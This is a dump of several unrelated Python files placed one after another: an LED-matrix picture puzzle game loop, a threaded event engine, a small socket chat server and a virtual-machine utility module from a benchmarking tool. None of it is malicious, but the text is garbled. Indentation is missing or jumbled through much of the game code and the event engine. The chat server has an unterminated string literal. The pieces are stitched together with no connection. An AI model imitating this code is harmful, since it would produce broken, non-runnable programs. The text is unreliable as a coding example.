for order in picture: ## 무작위로 변경된 순서대로, 즉 랜덤으로 그림 조각 하나씩 뽑혀 문제로 출제
if order == 'a': ## 문제로 출제될 그림 조각이 a일 경우, 수박의 첫번째 그림 조각이므로
from watermelon import QarrayScreen1 as QarrayScreen ## watermelon 파일에서 문제로 출제할 QarrayScreen1 이라는 수박 그림 조각을 불러옴
QiScreen=Matrix(QarrayScreen) ## matrix 함수를 통해 행렬 형태로 바꾸어 QiScreen에 저장
if order == 'b':
from watermelon import QarrayScreen2 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'c':
from watermelon import QarrayScreen3 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'd':
from watermelon import QarrayScreen4 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'e':
from icecream import QarrayScreen5 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'f':
from icecream import QarrayScreen6 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'g':
from icecream import QarrayScreen7 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'h':
from icecream import QarrayScreen8 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'i':
from strawberry import QarrayScreen9 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'j':
from strawberry import QarrayScreen10 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'k':
from heart import QarrayScreen11 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'l':
from heart import QarrayScreen12 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'm':
from dog import QarrayScreen13 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'n':
from dog import QarrayScreen14 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'o':
from dog import QarrayScreen15 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'p':
from dog import QarrayScreen16 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'q':
from dog import QarrayScreen17 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
if order == 'r':
from dog import QarrayScreen18 as QarrayScreen
QiScreen=Matrix(QarrayScreen)
                QoScreen=Matrix(QiScreen) ## Copy QiScreen into another Matrix, QoScreen
                LED_init() ## Light up the LED matrix
                draw_matrix(QoScreen); print() ## Draw QoScreen: the LED matrix lights up and shows the puzzle screen
                time.sleep(10) ## Show the puzzle screen for 10 seconds
## input
AiScreenDy=12
AiScreenDx=28
AiScreenDw=2
top=2
left=2
AarrayScreen=[
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
                [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1] ] ## AarrayScreen that receives the player's answer
AiScreen=Matrix(AarrayScreen)
                AoScreen=Matrix(AiScreen) ## Convert to matrix form and store
currBlk=Matrix(arrayBlk)
                tempBlk=AiScreen.clip(top,left,top+currBlk.get_dy(),left+currBlk.get_dx()) ## Clip the region the player's block will occupy,
                tempBlk=tempBlk+currBlk ## add the current block to build tempBlk,
                AoScreen.paste(tempBlk,top,left) ## and paste it into AoScreen
                draw_matrix(AoScreen); print() ## Call draw_matrix to show where the player's block is; since LED_init ran above, this also appears on the LED matrix
                hint=0 ## Ensures the hint can be used at most once per piece
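                ## LED color codes used by the keys below: 0=off, 3=yellow, 4=red, 7=green, 12=blue, 20=pink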
                while True: ## Loop until the player finishes entering an answer
                    print('Direction : q(quit), a(left), d(right), s(down), w(up)')
                    print('Fix the color block : r(red), y(yellow), g(green), b(blue), p(pink)')
print('Erase the block : e(erase)')
print('Use a hint : h(hint)')
print('Finish : \' \'')
                    key=input('Enter a key : ') ## Read a key from the player and store it in key
                    if key=='q':
                        Q=1
                        print('Game terminated')
                        break ## On 'q', set Q to 1 and leave the input loop so the game can end
                    elif key=='a':
                        if left==2:
                            continue ## If the block is already at the far left, do not move; go back to the input loop
                        left-=4 ## On 'a', decrease left by 4 to move the block one cell to the left
                    elif key=='d':
                        if left==26:
                            continue
                        left+=4 ## Same idea: move the block one cell to the right
                    elif key=='s':
                        if top==10:
                            continue
                        top+=4 ## Same idea: move the block one cell down
                    elif key=='w':
                        if top==2:
                            continue
                        top-=4 ## Same idea: move the block one cell up
                    elif key=='y':
                        for a in range(top,top+currBlk.get_dy()):
                            for b in range(left,left+currBlk.get_dx()):
                                if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==12)or(AarrayScreen[a][b]==20):
                                    AarrayScreen[a][b]=3
                                    continue ## On 'y', light the cell yellow
                                elif AarrayScreen[a][b]==3:
                                    AarrayScreen[a][b]=0
                                    continue ## If the cell is already yellow, turn it off
                    elif key=='r':
                        for a in range(top,top+currBlk.get_dy()):
                            for b in range(left,left+currBlk.get_dx()):
                                if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==12)or(AarrayScreen[a][b]==20):
                                    AarrayScreen[a][b]=4
                                    continue ## On 'r', light the cell red
                                elif AarrayScreen[a][b]==4:
                                    AarrayScreen[a][b]=0
                                    continue ## If the cell is already red, turn it off
                    elif key=='g':
                        for a in range(top,top+currBlk.get_dy()):
                            for b in range(left,left+currBlk.get_dx()):
                                if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==12)or(AarrayScreen[a][b]==20):
                                    AarrayScreen[a][b]=7
                                    continue ## On 'g', light the cell green
                                elif AarrayScreen[a][b]==7:
                                    AarrayScreen[a][b]=0
                                    continue ## If the cell is already green, turn it off
                    elif key=='b':
                        for a in range(top,top+currBlk.get_dy()):
                            for b in range(left,left+currBlk.get_dx()):
                                if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==20):
                                    AarrayScreen[a][b]=12
                                    continue ## On 'b', light the cell blue
                                elif AarrayScreen[a][b]==12:
                                    AarrayScreen[a][b]=0
                                    continue ## If the cell is already blue, turn it off
                    elif key=='p':
                        for a in range(top,top+currBlk.get_dy()):
                            for b in range(left,left+currBlk.get_dx()):
                                if (AarrayScreen[a][b]==0)or(AarrayScreen[a][b]==4)or(AarrayScreen[a][b]==3)or(AarrayScreen[a][b]==7)or(AarrayScreen[a][b]==12):
                                    AarrayScreen[a][b]=20
                                    continue ## On 'p', light the cell pink
                                elif AarrayScreen[a][b]==20:
                                    AarrayScreen[a][b]=0
                                    continue ## If the cell is already pink, turn it off
                    elif key=='e':
                        for a in range(top,top+currBlk.get_dy()):
                            for b in range(left,left+currBlk.get_dx()):
                                AarrayScreen[a][b]=0 ## On 'e', turn off whatever was lit in those cells
                    elif key=='h':
                        if hint==0: ## The hint may be used only once per picture piece
                            score=score-1 ## Using a hint deducts 1 point from the player's score
                            LED_init()
                            draw_matrix(QoScreen);print()
                            time.sleep(5) ## On 'h', show the puzzle screen again as a hint for 5 seconds
                            hint+=1 ## Bump hint so it cannot be used again
                    elif key==' ':
                        break ## On spacebar, leave the input loop and finish answering
else:
print('Wrong key!')
continue
AiScreen=Matrix(AarrayScreen)
tempBlk=AiScreen.clip(top,left,top+currBlk.get_dy(),left+currBlk.get_dx())
tempBlk=tempBlk+currBlk
AoScreen = Matrix(AiScreen)
AoScreen.paste(tempBlk, top, left)
draw_matrix(AoScreen); print()
                if Q==1: ## If the player pressed 'q' to leave the input loop, set i to -1 and keep breaking out of the loops
                    i=-1
                    break
draw_matrix(AiScreen); print()
                ## Compare the puzzle with the answer
                i = 0 ## Reset i to 0 for each piece puzzle
                for a in range(2,14):
                    for b in range(2, 30): ## Check that every cell of the puzzle screen matches the answer screen
                        if QarrayScreen[a][b] != AarrayScreen[a][b]:
                            print("You failed.") ## Any mismatch means the puzzle failed
                            thehalgguenya = input("Would you like to restart the game? (Y/N): ") ## Ask whether to restart
                            if thehalgguenya == "Y":
                                i = 1
                                break ## Failed but restarting: set i to 1 and leave the loop
                            elif thehalgguenya == "N":
                                i = 2
                                break ## Failed and stopping: set i to 2 and leave the loop
                            else:
                                print("Invalid input.")
                                continue
                    if (i==1)or(i==2):
                        break ## If i is 1 or 2, keep breaking out of the loops
                if i == 0: ## Every cell matched, so the puzzle succeeded; i stays 0
                    score=score+2
                    print("success")
                    continue ## Each solved piece earns 2 points; go back to the piece loop for the next puzzle
                if (i==1)or(i==2):
                    break ## If i is 1 or 2, keep breaking out of the loops
            if i == 0: ## Every piece of one picture has been solved
                print("You completed a picture.")
if order == 'a' or order == 'b' or order == 'c' or order == 'd':
                    from watermelon import QarrayScreen ## All watermelon pieces solved, so import the full watermelon picture QarrayScreen from the watermelon module
elif order == 'e' or order == 'f' or order == 'g' or order == 'h':
from icecream import QarrayScreen
elif order == 'i' or order == 'j':
from strawberry import QarrayScreen
elif order == 'k' or order == 'l':
from heart import QarrayScreen
                elif order == 'm' or order == 'n' or order == 'o' or order == 'p' or order == 'q' or order == 'r':
from dog import QarrayScreen
QiScreen=Matrix(QarrayScreen)
QoScreen=Matrix(QiScreen)
LED_init()
draw_matrix(QoScreen); print()
                time.sleep(5) ## Show the loaded QarrayScreen on the LED matrix for 5 seconds
            if (i==1)or(i==2):
                break ## If i is 1 or 2, keep breaking out of the loops
            if Q==1:
                break ## If Q is 1, keep breaking out of the loops
|
event.py
|
# -*- encoding: utf-8 -*-
"""
@File :event.py
@Desc :Event engine
@Date :2022-03-03 10:48
"""
from collections import defaultdict
from time import sleep
from threading import Thread
from queue import Queue, Empty
from .constant import EVENT_TIMER
class Event:
def __init__(self, etype, data = None):
self.etype = etype
self.data = data
class EventEngine:
"""
Event engine distributes event object based on its type
to those handlers registered.
It also generates timer event by every interval seconds,
which can be used for timing purpose.
"""
def __init__(self, interval = 1):
self._interval = interval
self._queue = Queue()
self._active = False
self._thread = Thread(target=self._run)
self._timer = Thread(target=self._run_timer)
self._handlers = defaultdict(list)
self._general_handlers = []
def _run(self):
while self._active:
try:
event = self._queue.get(block=True, timeout=1)
self._process(event)
except Empty:
pass
def _process(self, event):
if event.etype in self._handlers:
[handler(event) for handler in self._handlers[event.etype]]
if self._general_handlers:
[handler(event) for handler in self._general_handlers]
def _run_timer(self):
while self._active:
sleep(self._interval)
event = Event(EVENT_TIMER)
self.put(event)
def start(self):
self._active = True
self._thread.start()
self._timer.start()
def stop(self):
self._active = False
self._timer.join()
self._thread.join()
def put(self, event):
self._queue.put(event)
def register(self, etype, handler):
handler_list = self._handlers[etype]
if handler not in handler_list:
handler_list.append(handler)
def unregister(self, etype, handler):
handler_list = self._handlers[etype]
if handler in handler_list:
handler_list.remove(handler)
if not handler_list:
self._handlers.pop(etype)
def register_general(self, handler):
if handler not in self._general_handlers:
self._general_handlers.append(handler)
def unregister_general(self, handler):
if handler in self._general_handlers:
self._general_handlers.remove(handler)
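# Illustrative usage sketch (an assumption, not part of the original module).
# Handlers are plain callables taking an Event; once started, the engine also
# emits an EVENT_TIMER event every `interval` seconds:
#
#   engine = EventEngine(interval=1)
#   engine.register(EVENT_TIMER, lambda event: print("tick"))
#   engine.register_general(lambda event: print("saw", event.etype))
#   engine.start()
#   engine.put(Event("tick_data", data={"price": 10.0}))
#   ...
#   engine.stop()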
|
server.py
|
import socket # simple but powerful socket library
import threading # library to create threads
# defining host and port
host_ip = '127.0.0.1' # local machine IP; if hosting on a network, put the host's reachable IP here
port = 5555 # arbitrary unprivileged TCP port; TCP lets the host and users exchange packets of data reliably
# defining the server socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET means an IPv4 internet socket, SOCK_STREAM means a TCP socket
server.bind((host_ip, port)) # bind() expects a single (ip, port) tuple
server.listen()
# defining users and their usernames
users = []
usernames = []
# defining the function that'll enable a user to send a message to all other users
def message_to_all(msg):
for user in users:
user.send(msg)
# defining the function that'll handle the users making possible for them to send messages or get out of the chat room
def handle_users(user):
while True: # endless loop
try:
            msg = user.recv(2048) # receive data from the socket with a buffer size of 2^11 = 2048 bytes
message_to_all(msg)
        except Exception:
# removing user
user_index = users.index(user)
users.remove(user)
user.close()
username = usernames[user_index]
message_to_all(f'{username} has left the chat'.encode('ascii'))
usernames.remove(username)
break
# defining function that'll receive the new users
def receive():
while True:
user, address = server.accept()
print(f"Connected with {str(address)}") # this part is gonna be seing only by the administrator of the server
user.send('USER_NAME'.encode('ascii))
username = user.recv(2048).decode('ascii') # receiving the username
usernames.append(username) # appending it to the list of usernames
users.append(user) # appending it to the list of users
print(f"Username of the user is {username}") # this part is also gonna be seing only by the administrator
message_to_all(f'{username} has joined the chat, show how awesome this is'.encode('ascii'))
user.send('Connected successfully to the server'.encode('ascii'))
# defining the thread
        thread = threading.Thread(target=handle_users, args=(user,)) # the target function and its argument
thread.start()
# calling the receive function
receive()
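# Minimal companion client sketch (an assumption; not part of this file).
# It answers the server's 'USER_NAME' prompt, prints broadcasts, and relays
# typed lines:
#
#   import socket, threading
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(('127.0.0.1', 5555))
#   def listen():
#       while True:
#           msg = client.recv(2048).decode('ascii')
#           if msg == 'USER_NAME':
#               client.send('alice'.encode('ascii'))
#           else:
#               print(msg)
#   threading.Thread(target=listen, daemon=True).start()
#   while True:
#       client.send(input().encode('ascii'))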
|
vm_util.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of utility functions for working with virtual machines."""
import contextlib
import logging
import os
import platform
import random
import re
import string
import subprocess
import tempfile
import threading
import time
import jinja2
from perfkitbenchmarker import background_tasks
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import temp_dir
FLAGS = flags.FLAGS
PRIVATE_KEYFILE = 'perfkitbenchmarker_keyfile'
PUBLIC_KEYFILE = 'perfkitbenchmarker_keyfile.pub'
CERT_FILE = 'perfkitbenchmarker.pem'
# The temporary directory on VMs. We cannot reuse GetTempDir()
# because run_uri will not be available at time of module load and we need
# to use this directory as a base for other module level constants.
VM_TMP_DIR = '/tmp/pkb'
# Default timeout for issuing a command.
DEFAULT_TIMEOUT = 300
# Defaults for retrying commands.
POLL_INTERVAL = 30
TIMEOUT = 1200
FUZZ = .5
MAX_RETRIES = -1
WINDOWS = 'nt'
DARWIN = 'Darwin'
PASSWORD_LENGTH = 15
OUTPUT_STDOUT = 0
OUTPUT_STDERR = 1
OUTPUT_EXIT_CODE = 2
_SIMULATE_MAINTENANCE_SEMAPHORE = threading.Semaphore(0)
flags.DEFINE_integer('default_timeout', TIMEOUT, 'The default timeout for '
'retryable commands in seconds.')
flags.DEFINE_integer('burn_cpu_seconds', 0,
'Amount of time in seconds to burn cpu on vm before '
'starting benchmark')
flags.DEFINE_integer('burn_cpu_threads', 1, 'Number of threads to use to '
'burn cpu before starting benchmark.')
flags.DEFINE_integer('background_cpu_threads', None,
'Number of threads of background cpu usage while '
'running a benchmark')
flags.DEFINE_integer('background_network_mbits_per_sec', None,
'Number of megabits per second of background '
'network traffic to generate during the run phase '
'of the benchmark')
flags.DEFINE_boolean('simulate_maintenance', False,
'Whether to simulate VM maintenance during the benchmark. '
'This requires both benchmark and provider support.')
flags.DEFINE_integer('simulate_maintenance_delay', 0,
'The number of seconds to wait to start simulating '
'maintenance.')
class IpAddressSubset(object):
"""Enum of options for --ip_addresses."""
REACHABLE = 'REACHABLE'
BOTH = 'BOTH'
INTERNAL = 'INTERNAL'
EXTERNAL = 'EXTERNAL'
ALL = (REACHABLE, BOTH, INTERNAL, EXTERNAL)
flags.DEFINE_enum('ip_addresses', IpAddressSubset.REACHABLE,
IpAddressSubset.ALL,
'For networking tests: use both internal and external '
'IP addresses (BOTH), external and internal only if '
'the receiving VM is reachable by internal IP (REACHABLE), '
'external IP only (EXTERNAL) or internal IP only (INTERNAL)')
flags.DEFINE_enum('background_network_ip_type', IpAddressSubset.EXTERNAL,
(IpAddressSubset.INTERNAL, IpAddressSubset.EXTERNAL),
'IP address type to use when generating background network '
'traffic')
def GetTempDir():
"""Returns the tmp dir of the current run."""
return temp_dir.GetRunDirPath()
def PrependTempDir(file_name):
"""Returns the file name prepended with the tmp dir of the current run."""
return os.path.join(GetTempDir(), file_name)
def GenTempDir():
"""Creates the tmp dir for the current run if it does not already exist."""
temp_dir.CreateTemporaryDirectories()
def SSHKeyGen():
"""Create PerfKitBenchmarker SSH keys in the tmp dir of the current run."""
if not os.path.isdir(GetTempDir()):
GenTempDir()
if not os.path.isfile(GetPrivateKeyPath()):
create_cmd = ['ssh-keygen',
'-t',
'rsa',
'-N',
'',
'-q',
'-f',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
create_process.communicate()
if not os.path.isfile(GetCertPath()):
create_cmd = ['openssl',
'req',
'-x509',
'-new',
'-out',
PrependTempDir(CERT_FILE),
'-key',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
create_process.communicate(input='\n' * 7)
def GetPrivateKeyPath():
return PrependTempDir(PRIVATE_KEYFILE)
def GetPublicKeyPath():
return PrependTempDir(PUBLIC_KEYFILE)
def GetCertPath():
return PrependTempDir(CERT_FILE)
def GetSshOptions(ssh_key_filename, connect_timeout=5):
"""Return common set of SSH and SCP options."""
options = [
'-2',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'IdentitiesOnly=yes',
'-o', 'PreferredAuthentications=publickey',
'-o', 'PasswordAuthentication=no',
'-o', 'ConnectTimeout=%d' % connect_timeout,
'-o', 'GSSAPIAuthentication=no',
'-o', 'ServerAliveInterval=30',
'-o', 'ServerAliveCountMax=10',
'-i', ssh_key_filename
]
options.extend(FLAGS.ssh_options)
return options
# TODO(skschneider): Remove at least RunParallelProcesses and RunParallelThreads
# from this file (update references to call directly into background_tasks).
RunParallelProcesses = background_tasks.RunParallelProcesses
RunParallelThreads = background_tasks.RunParallelThreads
RunThreaded = background_tasks.RunThreaded
def Retry(poll_interval=POLL_INTERVAL, max_retries=MAX_RETRIES,
timeout=None, fuzz=FUZZ, log_errors=True,
retryable_exceptions=None):
"""A function decorator that will retry when exceptions are thrown.
Args:
poll_interval: The time between tries in seconds. This is the maximum poll
interval when fuzz is specified.
max_retries: The maximum number of retries before giving up. If -1, this
means continue until the timeout is reached. The function will stop
retrying when either max_retries is met or timeout is reached.
timeout: The timeout for all tries in seconds. If -1, this means continue
until max_retries is met. The function will stop retrying when either
max_retries is met or timeout is reached.
fuzz: The amount of randomness in the sleep time. This is used to
keep threads from all retrying at the same time. At 0, this
means sleep exactly poll_interval seconds. At 1, this means
sleep anywhere from 0 to poll_interval seconds.
log_errors: A boolean describing whether errors should be logged.
retryable_exceptions: A tuple of exceptions that should be retried. By
default, this is None, which indicates that all exceptions should
be retried.
Returns:
A function that wraps functions in retry logic. It can be
used as a decorator.
"""
if retryable_exceptions is None:
retryable_exceptions = Exception
def Wrap(f):
"""Wraps the supplied function with retry logic."""
def WrappedFunction(*args, **kwargs):
"""Holds the retry logic."""
local_timeout = FLAGS.default_timeout if timeout is None else timeout
if local_timeout >= 0:
deadline = time.time() + local_timeout
else:
deadline = float('inf')
tries = 0
while True:
try:
tries += 1
return f(*args, **kwargs)
except retryable_exceptions as e:
fuzz_multiplier = 1 - fuzz + random.random() * fuzz
sleep_time = poll_interval * fuzz_multiplier
if ((time.time() + sleep_time) >= deadline or
(max_retries >= 0 and tries > max_retries)):
raise
else:
if log_errors:
logging.info('Retrying exception running %s: %s', f.__name__, e)
time.sleep(sleep_time)
return WrappedFunction
return Wrap
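# Example (illustrative; `_WaitForSsh` is a hypothetical helper, and
# vm.RemoteCommand is assumed to raise until the VM is reachable): retry
# every ~5 seconds, at most 3 retries, giving up after 60 seconds total.
#
#   @Retry(poll_interval=5, max_retries=3, timeout=60)
#   def _WaitForSsh(vm):
#     vm.RemoteCommand('true')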
def IssueCommand(cmd, force_info_log=False, suppress_warning=False,
env=None, timeout=DEFAULT_TIMEOUT, cwd=None):
"""Tries running the provided command once.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
force_info_log: A boolean indicating whether the command result should
always be logged at the info level. Command results will always be
logged at the debug level if they aren't logged at another level.
suppress_warning: A boolean indicating whether the results should
not be logged at the info level in the event of a non-zero
return code. When force_info_log is True, the output is logged
regardless of suppress_warning's value.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
timeout: Timeout for the command in seconds. If the command has not finished
before the timeout is reached, it will be killed. Set timeout to None to
let the command run indefinitely. If the subprocess is killed, the
return code will indicate an error, and stdout and stderr will
contain what had already been written to them before the process was
killed.
cwd: Directory in which to execute the command.
Returns:
A tuple of stdout, stderr, and retcode from running the provided command.
"""
if env:
logging.debug('Environment variables: %s' % env)
full_cmd = ' '.join(cmd)
logging.info('Running: %s', full_cmd)
time_file_path = '/usr/bin/time'
runningOnWindows = RunningOnWindows()
runningOnDarwin = RunningOnDarwin()
should_time = (not (runningOnWindows or runningOnDarwin) and
os.path.isfile(time_file_path) and FLAGS.time_commands)
shell_value = runningOnWindows
with tempfile.TemporaryFile() as tf_out, \
tempfile.TemporaryFile() as tf_err, \
tempfile.NamedTemporaryFile(mode='r') as tf_timing:
cmd_to_use = cmd
if should_time:
cmd_to_use = [time_file_path,
'-o', tf_timing.name,
'--quiet',
'-f', ', WallTime:%Es, CPU:%Us, MaxMemory:%Mkb '] + cmd
process = subprocess.Popen(cmd_to_use, env=env, shell=shell_value,
stdin=subprocess.PIPE, stdout=tf_out,
stderr=tf_err, cwd=cwd)
def _KillProcess():
logging.error('IssueCommand timed out after %d seconds. '
'Killing command "%s".', timeout, full_cmd)
process.kill()
timer = threading.Timer(timeout, _KillProcess)
timer.start()
try:
process.wait()
finally:
timer.cancel()
tf_out.seek(0)
stdout = tf_out.read().decode('ascii', 'ignore')
tf_err.seek(0)
stderr = tf_err.read().decode('ascii', 'ignore')
timing_output = ''
if should_time:
timing_output = tf_timing.read().rstrip('\n')
debug_text = ('Ran: {%s} ReturnCode:%s%s\nSTDOUT: %s\nSTDERR: %s' %
(full_cmd, process.returncode, timing_output, stdout, stderr))
if force_info_log or (process.returncode and not suppress_warning):
logging.info(debug_text)
else:
logging.debug(debug_text)
return stdout, stderr, process.returncode
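# Example (illustrative):
#
#   stdout, stderr, retcode = IssueCommand(['echo', 'hello'], timeout=10)
#   if retcode:
#     logging.error('Command failed: %s', stderr)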
def IssueBackgroundCommand(cmd, stdout_path, stderr_path, env=None):
"""Run the provided command once in the background.
Args:
cmd: Command to be run, as expected by subprocess.Popen.
stdout_path: Redirect stdout here. Overwritten.
stderr_path: Redirect stderr here. Overwritten.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
"""
logging.debug('Environment variables: %s' % env)
full_cmd = ' '.join(cmd)
logging.info('Spawning: %s', full_cmd)
outfile = open(stdout_path, 'w')
errfile = open(stderr_path, 'w')
shell_value = RunningOnWindows()
subprocess.Popen(cmd, env=env, shell=shell_value,
stdout=outfile, stderr=errfile, close_fds=True)
@Retry()
def IssueRetryableCommand(cmd, env=None):
"""Tries running the provided command until it succeeds or times out.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
env: An alternate environment to pass to the Popen command.
Returns:
A tuple of stdout and stderr from running the provided command.
"""
stdout, stderr, retcode = IssueCommand(cmd, env=env)
if retcode:
raise errors.VmUtil.CalledProcessException(
'Command returned a non-zero exit code.\n')
return stdout, stderr
def ParseTimeCommandResult(command_result):
"""Parse command result and get time elapsed.
Note this parses the output of bash's time builtin, not /usr/bin/time or other
implementations. You may need to run something like bash -c "time ./command"
to produce parseable output.
Args:
command_result: The result after executing a remote time command.
Returns:
Time taken for the command.
"""
  time_data = re.findall(r'real\s+(\d+)m(\d+\.\d+)', command_result)
time_in_seconds = 60 * float(time_data[0][0]) + float(time_data[0][1])
return time_in_seconds
def ShouldRunOnExternalIpAddress():
"""Returns whether a test should be run on an instance's external IP."""
return FLAGS.ip_addresses in (IpAddressSubset.EXTERNAL,
IpAddressSubset.BOTH,
IpAddressSubset.REACHABLE)
def ShouldRunOnInternalIpAddress(sending_vm, receiving_vm):
"""Returns whether a test should be run on an instance's internal IP.
Based on the command line flag --ip_addresses. Internal IP addresses are used
when:
  * --ip_addresses=BOTH or --ip_addresses=INTERNAL
* --ip_addresses=REACHABLE and 'sending_vm' can ping 'receiving_vm' on its
internal IP.
Args:
sending_vm: VirtualMachine. The client.
receiving_vm: VirtualMachine. The server.
Returns:
Whether a test should be run on an instance's internal IP.
"""
return (FLAGS.ip_addresses in (IpAddressSubset.BOTH,
IpAddressSubset.INTERNAL) or
(FLAGS.ip_addresses == IpAddressSubset.REACHABLE and
sending_vm.IsReachable(receiving_vm)))
def GetLastRunUri():
"""Returns the last run_uri used (or None if it can't be determined)."""
runs_dir_path = temp_dir.GetAllRunsDirPath()
try:
dir_names = next(os.walk(runs_dir_path))[1]
except StopIteration:
# The runs directory was not found.
return None
if not dir_names:
# No run subdirectories were found in the runs directory.
return None
# Return the subdirectory with the most recent modification time.
return max(dir_names,
key=lambda d: os.path.getmtime(os.path.join(runs_dir_path, d)))
@contextlib.contextmanager
def NamedTemporaryFile(prefix='tmp', suffix='', dir=None, delete=True):
"""Behaves like tempfile.NamedTemporaryFile.
The existing tempfile.NamedTemporaryFile has the annoying property on
Windows that it cannot be opened a second time while it is already open.
This makes it impossible to use it with a "with" statement in a cross platform
compatible way. This serves a similar role, but allows the file to be closed
within a "with" statement without causing the file to be unlinked until the
context exits.
"""
f = tempfile.NamedTemporaryFile(prefix=prefix, suffix=suffix,
dir=dir, delete=False)
try:
yield f
finally:
if not f.closed:
f.close()
if delete:
os.unlink(f.name)
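# Example (illustrative): unlike tempfile.NamedTemporaryFile on Windows, the
# file can be closed and reopened by name inside the "with" block; it is only
# unlinked when the context exits.
#
#   with NamedTemporaryFile(suffix='.json') as tf:
#     tf.write(b'{}')
#     tf.close()                 # safe on all platforms; the file still exists
#     with open(tf.name) as f:   # reopen by name while the context is active
#       print(f.read())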
def GenerateSSHConfig(vms, vm_groups):
"""Generates an SSH config file to simplify connecting to the specified VMs.
Writes a file to GetTempDir()/ssh_config with an SSH configuration for each VM
provided in the arguments. Users can then SSH with any of the following:
ssh -F <ssh_config_path> <vm_name>
ssh -F <ssh_config_path> vm<vm_index>
ssh -F <ssh_config_path> <group_name>-<index>
Args:
vms: list of BaseVirtualMachines.
vm_groups: dict mapping VM group name string to list of BaseVirtualMachines.
"""
target_file = os.path.join(GetTempDir(), 'ssh_config')
template_path = data.ResourcePath('ssh_config.j2')
environment = jinja2.Environment(undefined=jinja2.StrictUndefined)
with open(template_path) as fp:
template = environment.from_string(fp.read())
with open(target_file, 'w') as ofp:
ofp.write(template.render({'vms': vms, 'vm_groups': vm_groups}))
ssh_options = [' ssh -F {0} {1}'.format(target_file, pattern)
for pattern in ('<vm_name>', 'vm<index>',
'<group_name>-<index>')]
logging.info('ssh to VMs in this benchmark by name with:\n%s',
'\n'.join(ssh_options))
